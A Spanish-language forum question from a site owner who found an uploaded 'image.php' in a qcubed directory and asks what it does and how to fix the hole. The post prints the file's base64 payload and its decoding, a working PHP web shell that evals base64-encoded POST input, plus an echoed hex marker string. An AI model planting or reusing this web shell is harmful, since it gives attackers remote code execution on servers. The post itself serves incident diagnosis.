¿Qué hace eval en la variable $ _POST ['e'] codificada en base64 realmente?
Ok, esto es lo que busqué en Google:
Parece que hay un archivo cargado llamado "image.php" que se carga en un directorio qcubed.
Ese archivo image.php contiene el siguiente código base64:
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
decodificado se agrega a esto:
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
Al buscar la cadena pasada encontré vulnerabilidades simillar qcubed en otros sitios.
Decodificando la última cadena con eco que obtuve:
196.231-172.28:ifacermpubmice:afac42eri02
Lo cual realmente no entiendo lo que hace (usando:http://ostermiller.org/calc/encode.html)
¿Me puede explicar a qué me enfrento en particular aquí? ¿Qué vulnerabilidad de seguridad debo abordar para solucionar esto?